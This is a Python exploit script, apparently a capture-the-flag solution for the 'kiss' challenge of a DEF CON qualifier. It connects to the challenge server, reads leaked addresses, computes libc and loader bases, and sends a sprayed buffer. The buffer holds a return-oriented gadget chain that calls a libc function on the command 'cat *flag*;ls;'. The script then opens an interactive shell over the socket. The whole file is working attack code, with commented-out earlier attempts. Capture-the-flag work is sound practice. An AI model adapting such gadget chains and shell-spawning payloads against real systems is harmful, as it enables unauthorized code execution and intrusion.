import phun

p = phun.Remote('kiss_88581d4e20dc97355f1d86b6905f6103.quals.shallweplayaga.me',3155)
#p = phun.Remote('makbox.i.dragonsector.pl', 1234)
#raw_input('x')
p.read("\n")
buffer = int(p.read("\n").strip().split(" ")[-1],16)
binary = int(p.read("\n").strip().split(" ")[-1],16)
libc  = binary  - 0x5ea000
libld = binary  - 0x225000
hit_addr = buffer + 0x800 
#hit_addr = 

p.sendline("0xa00")
p.read('\n')

#print hex(hit_addr)
#inp = "cat *flag*;id;\x00\x0"
inp1 = phun.p64(hit_addr+0x1a0) 
inp1 += "\xcc"*8
inp1 = inp1 * (0x900/16)

inp2 = phun.p64(hit_addr+0x1a8)
inp2 += phun.p64(hit_addr+0x1a8+8)
#inp2 += phun.p64(hit_addr+0x458+16)
inp2 += phun.p64(libld + 0x0001698b)
inp2 += phun.p64(libld + 0x0001a462)*4
inp2 += phun.p64(hit_addr+0x1a8+10*8)
inp2 += phun.p64(libld + 0xd9a)
inp2 += phun.p64(0)
inp2 += phun.p64(libc + 0x46640)
inp2 += "cat *flag*;ls;\x00\x00"
inp2 += "B"*8
inp2 = inp2 * ((0xa00-0x900)/len(inp2))
inp2 = inp2.ljust(0xa00-0x900,"B")

#inp += "\xcc"*8


#inp += "A"*32
# inp += phun.p64(hit_addr+40)
# inp += phun.p64(set_rsp)
# inp += phun.p64(set_rsi)
#inp += 

#inp += phun.p64(binary + 0x000000000000AC6)
#inp += phun.p64(hit_addr+32)
#inp += phun.p64(
#    0xffffffffff600000+7)
p.write(inp1+inp2)
p.read("?")
p.sendline(hex(hit_addr))
p.read("\n")

import telnetlib
t = telnetlib.Telnet()
t.sock = p.sock
t.interact()